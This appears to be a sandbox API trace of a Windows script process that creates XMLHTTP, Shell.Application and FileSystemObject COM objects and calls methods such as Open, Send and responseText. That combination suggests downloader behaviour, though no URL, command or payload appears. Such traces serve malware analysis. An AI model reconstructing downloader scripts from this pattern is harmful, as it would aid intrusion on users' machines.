	[0815.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0815.636] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0815.636] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0816.714] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0816.715] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0816.715] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0816.715] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0816.715] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0816.715] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0816.715] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0816.715] SysStringLen (param_1=0x0) returned 0x0
	[0816.715] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0816.716] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0816.716] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0816.716] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0816.716] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0816.716] ??2@YAPEAX_K@Z () returned 0x62f350
	[0816.716] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0816.716] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0816.716] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0816.716] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0816.716] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0816.716] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0816.717] SysStringLen (param_1=0x0) returned 0x0
	[0816.717] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0816.719] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0816.719] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0816.720] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0816.720] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0816.720] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0816.720] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0818.867] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0818.867] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0818.867] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0818.868] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0818.868] SysStringLen (param_1=0x0) returned 0x0
	[0818.868] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0818.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0818.869] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7280) returned 0x0
	[0818.869] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0818.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0818.869] ??2@YAPEAX_K@Z () returned 0x62f330
	[0818.869] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f330) 
	[0818.869] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0818.869] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0818.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7280) returned 0x0
	[0818.869] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7280) returned 0x3
	[0818.869] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0818.869] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7280, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0818.872] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7280, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0818.872] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0818.873] SysStringLen (param_1=0x0) returned 0x0
	[0818.873] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0818.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0818.873] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0818.873] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0818.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72e8) returned 0x0
	[0818.873] ??2@YAPEAX_K@Z () returned 0x62f310
	[0818.873] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72e8, pUnkSite=0x62f310) 
	[0818.873] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0818.873] XMLHTTPRequest:IUnknown:Release (This=0x49c72e8) returned 0x0
	[0818.873] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0818.873] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0818.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0818.874] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0818.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0818.874] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0818.874] SysStringLen (param_1=0x0) returned 0x0
	[0818.874] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0818.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0818.874] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0818.874] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0818.874] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0818.875] ??2@YAPEAX_K@Z () returned 0x62f330
	[0818.875] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0818.875] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0818.875] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0818.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0818.875] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0818.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0818.875] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0818.875] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0818.875] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0818.875] SysStringLen (param_1=0x0) returned 0x0
	[0818.876] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0818.876] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0818.876] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7260) returned 0x0
	[0818.876] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0818.876] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c72c8) returned 0x0
	[0818.876] ??2@YAPEAX_K@Z () returned 0x62f310
	[0818.876] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c72c8, pUnkSite=0x62f310) 
	[0818.876] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0818.876] XMLHTTPRequest:IUnknown:Release (This=0x49c72c8) returned 0x0
	[0818.876] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7260) returned 0x0
	[0818.876] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7260) returned 0x3
	[0818.876] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0818.877] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7260, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0818.877] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7260, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0818.877] longjmp () 
	[0818.877] longjmp () 
